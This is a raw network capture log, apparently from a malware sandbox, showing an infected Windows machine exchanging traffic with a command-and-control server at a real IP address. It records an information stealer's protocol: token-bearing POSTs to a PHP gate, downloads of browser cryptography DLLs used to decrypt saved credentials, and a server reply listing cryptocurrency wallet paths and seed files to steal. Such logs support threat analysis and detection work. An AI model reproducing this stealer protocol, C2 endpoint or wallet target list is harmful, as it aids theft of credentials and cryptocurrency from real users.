Dec 10, 2024 00:42:20.108181953 CET	565	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----ECBGCGCGIEGCBFHIIEBF Host: 185.215.113.206 Content-Length: 363 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 32 31 71 62 47 78 74 65 57 31 73 59 6e 70 78 4c 6e 42 33 5a 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 45 43 42 47 43 47 43 47 49 45 47 43 42 46 48 49 49 45 42 46 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d [TRUNCATED] Data Ascii: ------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="file_name"c21qbGxteW1sYnpxLnB3ZA==------ECBGCGCGIEGCBFHIIEBFContent-Disposition: form-data; name="file"------ECBGCGCGIEGCBFHIIEBF--
Dec 10, 2024 00:42:21.031569958 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:20 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=97 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 10, 2024 00:42:21.264900923 CET	94	OUT	GET /68b591d6548ec281/freebl3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 10, 2024 00:42:21.701158047 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:21 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "a7550-5e7e950876500" Accept-Ranges: bytes Content-Length: 685392 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 0e 08 00 00 34 02 00 00 00 00 00 70 12 08 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 d0 0a 00 00 04 00 00 cb fd 0a 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 48 1c 0a 00 53 00 00 00 9b 1c 0a 00 c8 00 00 00 00 90 0a 00 78 03 00 00 00 00 00 00 00 00 00 00 00 46 0a 00 50 2f 00 00 00 a0 0a 00 f0 23 00 00 94 16 0a 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 20 08 00 a0 00 00 00 00 00 00 00 00 00 00 00 a4 1e [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!4p@AHSxFP/# @.text `.rdata @@.data<F0@.00cfg@@.rsrcx@@.reloc#$"@B
Dec 10, 2024 00:42:21.701236010 CET	1236	IN	Data Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 89 e5 68 4f 01 00 00 e8 f2 0b 08 00 83 c4 04 85 c0 74 0e 89 80 38 01 00 00 83 c0 0f 83 e0 f0 5d c3 68 13 e0 ff ff e8 c7 0b Data Ascii: UhOt8]h1]UWVEtu}UMt"0(h&40jVjjRQP?^_]USWVhO?t0
Dec 10, 2024 00:42:21.701245070 CET	248	IN	Data Raw: 55 07 08 00 83 c4 08 eb ce cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 83 e4 f8 83 ec 58 89 4c 24 2c 8b 7d 1c a1 b4 30 0a 10 31 e8 89 44 24 50 c7 44 24 3c 10 00 00 00 83 ff 18 72 19 89 f8 83 e0 07 75 12 8d 47 f8 3b 45 14 76 14 68 03 e0 ff Data Ascii: UUSWVXL$,}01D$PD$<ruG;Evhh\|$,}uT$4D$0P\|OL$8PVS'D$@?@L$L$D$D$D$$
Dec 10, 2024 00:42:21.701396942 CET	1236	IN	Data Raw: 00 00 31 d2 31 c9 89 5c 24 28 eb 24 89 c7 8b 44 24 1c 83 c0 01 83 f8 06 8b 54 24 18 8b 4c 24 14 0f 84 e2 01 00 00 89 44 24 1c 8a 44 24 07 04 ff 8b 74 24 38 0f 1f 84 00 00 00 00 00 89 c3 88 44 24 07 8b 44 24 40 89 cf 89 4c 24 14 0f b6 c9 c1 e1 18 Data Ascii: 11\$($D$T$L$D$D$t$8D$D$@L$T$\|$ L$$\$\$T$1%1%1T$D\|$@\|$t\$(D$\$(sFD$,D$
Dec 10, 2024 00:42:21.701407909 CET	1236	IN	Data Raw: 45 dc 89 ca f7 da c1 fa 1f f7 d2 8b 45 1c 80 7c 30 f7 01 19 db 09 d3 b8 01 00 00 00 29 c8 c1 f8 1f 8b 55 1c 80 7c 32 f6 01 19 d2 f7 d0 09 c2 21 da 21 fa b8 02 00 00 00 29 c8 c1 f8 1f f7 d0 8b 5d 1c 80 7c 33 f5 01 19 ff 09 c7 b8 03 00 00 00 29 c8 Data Ascii: EE\|0)U\|2!!)]\|3)\|3!)}\|7!!)U\|2)\|2!!)M\|1t/EU;U]w"1E9t:RVP -
Dec 10, 2024 00:42:21.701416969 CET	1236	IN	Data Raw: 45 08 c7 47 08 00 00 00 00 89 47 04 8b 48 04 ff 15 00 80 0a 10 ff d1 89 07 85 c0 74 31 8b 55 0c 89 f9 ff 75 14 ff 75 10 e8 17 fd ff ff 83 c4 08 85 c0 74 2c 8b 1f 85 db 74 14 8b 47 04 8b 48 0c ff 15 00 80 0a 10 6a 01 53 ff d1 83 c4 08 c7 47 08 01 Data Ascii: EGGHt1Uuut,tGHjSGW:G^_[]USWVUM]u>F9t:NVFMUtHHjWhjV4%tUVPdnFEFEF
Dec 10, 2024 00:42:21.701426029 CET	1236	IN	Data Raw: 31 e9 e8 29 f6 07 00 89 f0 81 c4 04 01 00 00 5e 5f 5b 5d c3 cc cc cc cc cc cc cc cc cc cc cc cc 55 89 e5 53 57 56 81 ec 08 01 00 00 a1 b4 30 0a 10 31 e8 89 45 f0 68 02 01 00 00 e8 9f f7 07 00 83 c4 04 31 ff 85 c0 0f 84 fc 00 00 00 89 c6 8b 45 0c Data Ascii: 1)^_[]USWV01Eh1E=s hkhVohh !Vf.@uVuW)9wSuWT
Dec 10, 2024 00:42:21.709673882 CET	1236	IN	Data Raw: 89 cf 8b 45 f0 88 14 30 00 d3 0f b6 c3 8b 4d 10 8a 51 02 8b 4d f0 32 14 01 8b 4d d4 8b 45 e4 88 50 02 8b 5d dc 8b 45 d0 8b 55 d8 2b 55 cc 89 55 d8 83 c7 04 83 c3 04 8b 55 e0 39 d1 0f 86 c9 01 00 00 29 d1 0f 84 de 01 00 00 89 5d dc 89 7d e4 89 c8 Data Ascii: E0MQM2MEP]EU+UUU9)]}1EEMAMfo 1ff}]fn4ff`fafofrfo f[fpffpffof
Dec 10, 2024 00:42:21.709789038 CET	1236	IN	Data Raw: 88 14 18 8b 5d dc 00 d6 0f b6 c6 8b 55 f0 0f b6 04 02 c1 e0 18 09 f0 8b 75 d8 33 45 d4 8b 55 e8 89 04 13 8b 45 e8 83 c6 fc 83 c0 04 89 75 d8 83 fe 03 0f 87 f0 fe ff ff 8b 7d ec 01 c7 8b 55 e4 01 c2 89 c6 89 d0 01 f3 89 ca 83 7d d8 00 0f 84 03 02 Data Ascii: ]Uu3EUEu}U}]E]E8u40480u}T20ETEuE14^_[]UM1]U}f.MM
Dec 10, 2024 00:42:21.718141079 CET	1236	IN	Data Raw: 8d dc fe ff ff 8b 41 10 89 85 ac fe ff ff 89 c6 01 d6 8b 53 24 89 95 1c ff ff ff 8b 41 14 89 85 b0 fe ff ff 89 c7 11 d7 8b 41 30 89 85 d0 fe ff ff 01 c6 89 f3 8b 41 34 89 85 d4 fe ff ff 11 c7 89 7d f0 8b 71 54 31 fe 8b 51 50 31 da 89 d8 81 f6 ab Data Ascii: AS$AA0A4}qT1QP1kA+]rn<}33Ht{({,]HE]11EuUUuu11U
Dec 10, 2024 00:42:23.121587992 CET	94	OUT	GET /68b591d6548ec281/mozglue.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 10, 2024 00:42:23.557239056 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:23 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "94750-5e7e950876500" Accept-Ranges: bytes Content-Length: 608080 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 07 00 a4 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 b6 07 00 00 5e 01 00 00 00 00 00 c0 b9 03 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 80 09 00 00 04 00 00 6a aa 09 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 01 60 08 00 e3 57 00 00 e4 b7 08 00 2c 01 00 00 00 20 09 00 b0 08 00 00 00 00 00 00 00 00 00 00 00 18 09 00 50 2f 00 00 00 30 09 00 d8 41 00 00 14 53 08 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 bc f8 07 00 18 00 00 00 68 d0 07 00 a0 00 00 00 00 00 00 00 00 00 00 00 ec bc [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!^j@A`W, P/0AShZ.texta `.rdata@@.dataD@.00cfg@@.tls@.rsrc @@.relocA0B@B
Dec 10, 2024 00:42:24.490875006 CET	95	OUT	GET /68b591d6548ec281/msvcp140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 10, 2024 00:42:24.936892986 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:24 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "6dde8-5e7e950876500" Accept-Ranges: bytes Content-Length: 450024 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 d9 93 31 43 9d f2 5f 10 9d f2 5f 10 9d f2 5f 10 29 6e b0 10 9f f2 5f 10 94 8a cc 10 8b f2 5f 10 9d f2 5e 10 22 f2 5f 10 cf 9a 5e 11 9e f2 5f 10 cf 9a 5c 11 95 f2 5f 10 cf 9a 5b 11 d3 f2 5f 10 cf 9a 5a 11 d1 f2 5f 10 cf 9a 5f 11 9c f2 5f 10 cf 9a a0 10 9c f2 5f 10 cf 9a 5d 11 9c f2 5f 10 52 69 63 68 9d f2 5f 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 06 00 82 ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 28 06 00 00 82 00 00 00 00 00 00 60 d9 03 00 00 10 00 00 00 40 06 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 f0 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$1C___)n__^"_^_\_[_Z____]_Rich_PEL0]"!(`@,@AgrA=`x8w@pc@.text&( `.dataH)@,@.idatapD@@.didat4X@.rsrcZ@@.reloc=>^@B
Dec 10, 2024 00:42:25.672734022 CET	91	OUT	GET /68b591d6548ec281/nss3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 10, 2024 00:42:26.107309103 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:25 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "1f3950-5e7e950876500" Accept-Ranges: bytes Content-Length: 2046288 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 d0 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 d8 19 00 00 2e 05 00 00 00 00 00 60 a3 14 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 70 1f 00 00 04 00 00 6c 2d 20 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 e4 26 1d 00 fa 9d 00 00 de c4 1d 00 40 01 00 00 00 50 1e 00 78 03 00 00 00 00 00 00 00 00 00 00 00 0a 1f 00 50 2f 00 00 00 60 1e 00 5c 08 01 00 b0 01 1d 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 f0 19 00 a0 00 00 00 00 00 00 00 00 00 00 00 7c ca [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!.`pl- @A&@PxP/`\\|\&@.text `.rdatal@@.dataDR.@.00cfg@@@.rsrcxP@@.reloc\`@B
Dec 10, 2024 00:42:29.217961073 CET	95	OUT	GET /68b591d6548ec281/softokn3.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 10, 2024 00:42:29.652215958 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:29 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "3ef50-5e7e950876500" Accept-Ranges: bytes Content-Length: 257872 Content-Type: application/x-msdos-program Data Raw: 4d 5a 78 00 01 00 00 00 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 78 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 24 00 00 50 45 00 00 4c 01 06 00 f3 34 12 63 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 00 00 cc 02 00 00 f0 00 00 00 00 00 00 50 cf 02 00 00 10 00 00 00 00 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 01 00 00 00 00 00 06 00 01 00 00 00 00 00 00 00 04 00 00 04 00 00 53 67 04 00 02 00 40 41 00 00 10 00 00 10 00 00 00 00 10 00 00 10 00 00 00 00 00 00 10 00 00 00 44 76 03 00 53 01 00 00 97 77 03 00 f0 00 00 00 00 b0 03 00 80 03 00 00 00 00 00 00 00 00 00 00 00 c0 03 00 50 2f 00 00 00 c0 03 00 c8 35 00 00 38 71 03 00 1c 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 e0 02 00 a0 00 00 00 00 00 00 00 00 00 00 00 14 7b [TRUNCATED] Data Ascii: MZx@x!L!This program cannot be run in DOS mode.$PEL4c"!PSg@ADvSwP/58q{.text& `.rdata@@.data\|@.00cfg@@.rsrc@@.reloc56@B
Dec 10, 2024 00:42:30.372231960 CET	99	OUT	GET /68b591d6548ec281/vcruntime140.dll HTTP/1.1 Host: 185.215.113.206 Cache-Control: no-cache
Dec 10, 2024 00:42:30.809103966 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:30 GMT Server: Apache/2.4.41 (Ubuntu) Last-Modified: Mon, 05 Sep 2022 07:49:08 GMT ETag: "13bf0-5e7e950876500" Accept-Ranges: bytes Content-Length: 80880 Content-Type: application/x-msdos-program Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 c0 c5 e4 d5 84 a4 8a 86 84 a4 8a 86 84 a4 8a 86 30 38 65 86 86 a4 8a 86 8d dc 19 86 8f a4 8a 86 84 a4 8b 86 ac a4 8a 86 d6 cc 89 87 97 a4 8a 86 d6 cc 8e 87 90 a4 8a 86 d6 cc 8f 87 9f a4 8a 86 d6 cc 8a 87 85 a4 8a 86 d6 cc 75 86 85 a4 8a 86 d6 cc 88 87 85 a4 8a 86 52 69 63 68 84 a4 8a 86 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 7c ea 30 5d 00 00 00 00 00 00 00 00 e0 00 22 21 0b 01 0e 0f 00 de 00 00 00 1c 00 00 00 00 00 00 90 d9 00 00 00 10 00 00 00 f0 00 00 00 00 00 10 00 10 00 00 00 02 00 00 06 00 00 00 0a 00 00 00 06 00 00 00 00 00 00 00 00 30 01 00 00 04 00 00 d4 6d 01 00 03 00 40 41 00 00 10 00 00 10 00 00 00 00 [TRUNCATED] Data Ascii: MZ@!L!This program cannot be run in DOS mode.$08euRichPEL\|0]"!0m@AA 8 @.text `.data@.idata@@.rsrc@@.reloc @B
Dec 10, 2024 00:42:31.504838943 CET	203	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----JECAFHJEGCFCBFIEGCAE Host: 185.215.113.206 Content-Length: 1067 Connection: Keep-Alive Cache-Control: no-cache
Dec 10, 2024 00:42:32.428180933 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:31 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=90 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
Dec 10, 2024 00:42:32.506237984 CET	469	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----HCAEHDHDAKJEBGCBKKJE Host: 185.215.113.206 Content-Length: 267 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 48 43 41 45 48 44 48 44 41 4b 4a 45 42 47 43 42 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 44 48 44 41 4b 4a 45 42 47 43 42 4b 4b 4a 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 77 61 6c 6c 65 74 73 0d 0a 2d 2d 2d 2d 2d 2d 48 43 41 45 48 44 48 44 41 4b 4a 45 42 47 43 42 4b 4b 4a 45 2d 2d 0d 0a Data Ascii: ------HCAEHDHDAKJEBGCBKKJEContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------HCAEHDHDAKJEBGCBKKJEContent-Disposition: form-data; name="message"wallets------HCAEHDHDAKJEBGCBKKJE--
Dec 10, 2024 00:42:32.943080902 CET	1236	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:32 GMT Server: Apache/2.4.41 (Ubuntu) Vary: Accept-Encoding Content-Length: 2408 Keep-Alive: timeout=5, max=89 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8 Data Raw: 51 6d 6c 30 59 32 39 70 62 69 42 44 62 33 4a 6c 66 44 46 38 58 45 4a 70 64 47 4e 76 61 57 35 63 64 32 46 73 62 47 56 30 63 31 78 38 64 32 46 73 62 47 56 30 4c 6d 52 68 64 48 77 78 66 45 4a 70 64 47 4e 76 61 57 34 67 51 32 39 79 5a 53 42 50 62 47 52 38 4d 58 78 63 51 6d 6c 30 59 32 39 70 62 6c 78 38 4b 6e 64 68 62 47 78 6c 64 43 6f 75 5a 47 46 30 66 44 42 38 52 47 39 6e 5a 57 4e 76 61 57 35 38 4d 58 78 63 52 47 39 6e 5a 57 4e 76 61 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 46 4a 68 64 6d 56 75 49 45 4e 76 63 6d 56 38 4d 58 78 63 55 6d 46 32 5a 57 35 63 66 43 70 33 59 57 78 73 5a 58 51 71 4c 6d 52 68 64 48 77 77 66 45 52 68 5a 57 52 68 62 48 56 7a 49 45 31 68 61 57 35 75 5a 58 52 38 4d 58 78 63 52 47 46 6c 5a 47 46 73 64 58 4d 67 54 57 46 70 62 6d 35 6c 64 46 78 33 59 57 78 73 5a 58 52 7a 58 48 78 7a 61 47 55 71 4c 6e 4e 78 62 47 6c 30 5a 58 77 77 66 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 46 74 49 45 64 79 5a 57 56 75 66 44 46 38 58 45 4a 73 62 32 4e 72 63 33 52 79 5a 57 [TRUNCATED] Data Ascii: Qml0Y29pbiBDb3JlfDF8XEJpdGNvaW5cd2FsbGV0c1x8d2FsbGV0LmRhdHwxfEJpdGNvaW4gQ29yZSBPbGR8MXxcQml0Y29pblx8KndhbGxldCouZGF0fDB8RG9nZWNvaW58MXxcRG9nZWNvaW5cfCp3YWxsZXQqLmRhdHwwfFJhdmVuIENvcmV8MXxcUmF2ZW5cfCp3YWxsZXQqLmRhdHwwfERhZWRhbHVzIE1haW5uZXR8MXxcRGFlZGFsdXMgTWFpbm5ldFx3YWxsZXRzXHxzaGUqLnNxbGl0ZXwwfEJsb2Nrc3RyZWFtIEdyZWVufDF8XEJsb2Nrc3RyZWFtXEdyZWVuXHdhbGxldHNcfCouKnwxfFdhc2FiaSBXYWxsZXR8MXxcV2FsbGV0V2FzYWJpXENsaWVudFxXYWxsZXRzXHwqLmpzb258MHxFdGhlcmV1bXwxfFxFdGhlcmV1bVx8a2V5c3RvcmV8MHxFbGVjdHJ1bXwxfFxFbGVjdHJ1bVx3YWxsZXRzXHwqLip8MHxFbGVjdHJ1bUxUQ3wxfFxFbGVjdHJ1bS1MVENcd2FsbGV0c1x8Ki4qfDB8RXhvZHVzfDF8XEV4b2R1c1x8ZXhvZHVzLmNvbmYuanNvbnwwfEV4b2R1c3wxfFxFeG9kdXNcfHdpbmRvdy1zdGF0ZS5qc29ufDB8RXhvZHVzXGV4b2R1cy53YWxsZXR8MXxcRXhvZHVzXGV4b2R1cy53YWxsZXRcfHBhc3NwaHJhc2UuanNvbnwwfEV4b2R1c1xleG9kdXMud2FsbGV0fDF8XEV4b2R1c1xleG9kdXMud2FsbGV0XHxzZWVkLnNlY298MHxFeG9kdXNcZXhvZHVzLndhbGxldHwxfFxFeG9kdXNcZXhvZHVzLndhbGxldFx8aW5mby5zZWNvfDB8RWxlY3Ryb24gQ2FzaHwxfFxFbGVjdHJvbkNhc2hcd2FsbGV0c1x8Ki4qfDB8TXVsdGlEb2dlfDF8
Dec 10, 2024 00:42:32.945825100 CET	467	OUT	POST /c4becf79229cb002.php HTTP/1.1 Content-Type: multipart/form-data; boundary=----IEHDAFHDHCBFIDGCFIDG Host: 185.215.113.206 Content-Length: 265 Connection: Keep-Alive Cache-Control: no-cache Data Raw: 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 65 66 62 33 34 31 66 38 38 31 66 66 36 62 34 35 39 30 36 32 30 37 38 36 38 34 37 65 63 65 35 33 66 36 35 36 66 33 30 34 34 65 30 31 30 34 63 31 33 30 39 65 66 36 33 63 30 34 37 35 39 31 34 35 35 34 30 62 61 35 31 38 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 66 69 6c 65 73 0d 0a 2d 2d 2d 2d 2d 2d 49 45 48 44 41 46 48 44 48 43 42 46 49 44 47 43 46 49 44 47 2d 2d 0d 0a Data Ascii: ------IEHDAFHDHCBFIDGCFIDGContent-Disposition: form-data; name="token"efb341f881ff6b4590620786847ece53f656f3044e0104c1309ef63c04759145540ba518------IEHDAFHDHCBFIDGCFIDGContent-Disposition: form-data; name="message"files------IEHDAFHDHCBFIDGCFIDG--
Dec 10, 2024 00:42:33.382426977 CET	202	IN	HTTP/1.1 200 OK Date: Mon, 09 Dec 2024 23:42:33 GMT Server: Apache/2.4.41 (Ubuntu) Content-Length: 0 Keep-Alive: timeout=5, max=88 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8
